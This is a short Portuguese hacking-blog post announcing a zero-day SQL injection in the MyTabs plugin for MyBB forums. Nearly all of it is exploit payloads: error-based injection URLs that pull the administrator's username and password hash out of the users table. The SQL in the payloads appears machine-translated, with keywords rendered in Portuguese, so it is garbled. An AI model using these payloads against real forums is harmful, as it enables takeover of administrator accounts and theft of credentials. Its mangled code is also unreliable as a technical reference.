terça-feira, 19 de junho de 2012

MyBB 0day \ MyTabs (plugin) SQL injection vulnerability

$ ~ Http://localhost/mybbpath/index.php?tab = [SQLI]



---------------------------------------

# ~ ~ # Expl0itation

---------------------------------------



$ ~ Obter nome de usuário do administrador (geralmente tem uid = 1) ~




http://localhost/mybbpath/index.php?tab=1 '
e (selecione 1 (select count (*), concat ((SELECT nome de usuário
mybb_users onde uid = 1), piso (Rand (0) * 2)) de uma
INFORMATION_SCHEMA.TABLES grupo, por um b)) ---



$ ~ Obter a senha do administrador ~



http://localhost/mybbpath/index.php?tab=1 '
e (selecione 1 (select count (*), concat ((selecione senha
mybb_users onde uid = 1), piso (Rand (0) * 2)) de uma
INFORMATION_SCHEMA.TABLES grupo, por um b)) ---
← Postagem mais recente Postagem mais antiga → Página inicial

0 comentários:

Postar um comentário

Copyright © Hacking & Security | Powered by Xandao Design by Xandao86 | Xandao86